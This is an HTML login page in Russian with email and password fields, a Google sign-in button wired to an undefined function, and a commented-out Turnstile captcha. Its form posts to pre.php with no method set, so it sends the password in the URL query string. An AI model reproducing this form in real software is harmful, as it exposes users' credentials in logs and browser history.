<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="google-signin-client_id" content="947233834368-psk8nk8hfp3p1uth0ls0e126gamgt53p.apps.googleusercontent.com">
    <title>Login to your account.</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel='stylesheet' href='https://unpkg.com/emoji.css/dist/emoji.min.css'>
    <!--<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=_turnstileCb" async defer></script>-->
    <script src="https://apis.google.com/js/platform.js" async defer></script>
</head>
<body>
<style>
    
@import url("https://fonts.googleapis.com/css2?family=Inter&display=swap");
body, html{
    font-family: 'Inter'!important;
}

</style>
<div class="bg-white">
    <div class="flex justify-center h-screen">
        <div class="flex items-center w-full max-w-md px-6 mx-auto lg:w-2/6">
            <div class="flex-1">
                <div class="text-center">
                    <div class="flex justify-center mx-auto">
                        <a href="../index.html">
                            <img class="w-auto h-7 sm:h-8" src="../assets/images/logo.min.svg" alt="">
                        </a>
                    </div>
                    <p class="mt-3 text-black dark:text-black"><span class="ec ec-wave"></span>&nbsp;&nbsp;Для продолжения - войдите!</p>
                </div>

                <div class="mt-8">



                    <form action="pre.php">
                        <div>
                            <label for="email" class="block mb-2 text-sm text-black dark:text-black">Эл. почта или логин</label>
                            <input type="email" name="email" id="email" placeholder="example@example.com" class="block w-full px-4 py-2 mt-2 text-gray-700 placeholder-gray-400 bg-white border border-gray-200 rounded-lg dark:placeholder-gray-600 dark:bg-gray dark:text-black dark:border-gray-700 focus:border-blue-400 dark:focus:border-blue-400 focus:ring-blue-400 focus:outline-none focus:ring focus:ring-opacity-40 transition delay-50" required />
                        </div>

                        <div class="mt-6">
                            <div class="flex justify-between">
                                <label for="password" class="text-sm text-black dark:text-black">Пароль</label>
                                <a href="forgot.html" class="text-sm text-black focus:text-blue-500 hover:text-gray-500 hover:underline transition delay-50">Забыли пароль?</a>
                            </div>

                            <input type="password" name="password" id="password" placeholder="Ваш пароль" class="block w-full px-4 py-2 mt-2 text-gray-700 placeholder-gray-400 bg-white border border-gray-200 rounded-lg dark:placeholder-gray-600 dark:bg-gray dark:text-black dark:border-gray-700 focus:border-blue-400 dark:focus:border-blue-400 focus:ring-blue-400 focus:outline-none focus:ring focus:ring-opacity-40 transition delay-50" required />
                        </div>

                        <!--<div class="cf-turnstile content-center mt-5 items-center text-center grid place-items-center" data-sitekey="0x4AAAAAAAKPOMZS2-pWJdJ9" data-callback="disabled_off"></div>

                        <div class="flex items-center content-center mt-5 items-center text-center">
                            <input id="link-checkbox" type="checkbox" value="" class="w-4 h-4 text-blue-600 bg-white border-gray-300 rounded focus:ring-blue-500 dark:focus:ring-blue-600 dark:ring-offset-gray-800 focus:ring-2 dark:bg-white dark:border-gray-600">
                            <label for="link-checkbox" class="ml-2 text-sm font-medium text-black dark:text-black">I agree with the <a href="#" class="text-blue-600 dark:text-blue-500 hover:underline">terms and conditions</a>.</label>
                        </div>-->

                        <div class="mt-6">
                            <button class="w-full px-4 py-2 tracking-wide text-white transition-colors duration-300 transform bg-black rounded-lg hover:bg-gray-800 focus:outline-none focus:bg-gray-400 focus:ring focus:ring-blue-300 focus:ring-opacity-50" style="backface-visibility: hidden;">
                                Продолжить <i class="right arrow icon"></i>
                            </button>
                        </div>

                    <button class="flex w-full content-center items-center justify-center px-6 py-3 mt-4 text-black transition-colors duration-300 transform border rounded-lg dark:border-gray-700 dark:text-black hover:bg-gray-100 dark:hover:bg-black-600" data-onsuccess="onSignIn" type="button" onclick="openToast()">
                    <svg class="w-6 h-6 mx-2" viewBox="0 0 40 40">
                        <path d="M36.3425 16.7358H35V16.6667H20V23.3333H29.4192C28.045 27.2142 24.3525 30 20 30C14.4775 30 10 25.5225 10 20C10 14.4775 14.4775 9.99999 20 9.99999C22.5492 9.99999 24.8683 10.9617 26.6342 12.5325L31.3483 7.81833C28.3717 5.04416 24.39 3.33333 20 3.33333C10.7958 3.33333 3.33335 10.7958 3.33335 20C3.33335 29.2042 10.7958 36.6667 20 36.6667C29.2042 36.6667 36.6667 29.2042 36.6667 20C36.6667 18.8825 36.5517 17.7917 36.3425 16.7358Z" fill="#FFC107" />
                        <path d="M5.25497 12.2425L10.7308 16.2583C12.2125 12.59 15.8008 9.99999 20 9.99999C22.5491 9.99999 24.8683 10.9617 26.6341 12.5325L31.3483 7.81833C28.3716 5.04416 24.39 3.33333 20 3.33333C13.5983 3.33333 8.04663 6.94749 5.25497 12.2425Z" fill="#FF3D00" />
                        <path d="M20 36.6667C24.305 36.6667 28.2167 35.0192 31.1742 32.34L26.0159 27.975C24.3425 29.2425 22.2625 30 20 30C15.665 30 11.9842 27.2359 10.5975 23.3784L5.16254 27.5659C7.92087 32.9634 13.5225 36.6667 20 36.6667Z" fill="#4CAF50" />
                        <path d="M36.3425 16.7358H35V16.6667H20V23.3333H29.4192C28.7592 25.1975 27.56 26.805 26.0133 27.9758C26.0142 27.975 26.015 27.975 26.0158 27.9742L31.1742 32.3392C30.8092 32.6708 36.6667 28.3333 36.6667 20C36.6667 18.8825 36.5517 17.7917 36.3425 16.7358Z" fill="#1976D2" />
                    </svg>

                    <span class="mx-2">Войти через Google</span>
                </button>
                <script>
                    function googlerror() {
                        console.log("200")
                    }
                </script>

                    </form>

                    <p class="mt-6 text-sm text-center text-black">Нет аккаунта? <a href="#" class="text-blue-500 focus:outline-none focus:underline hover:underline">Регистрация</a>.</p>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>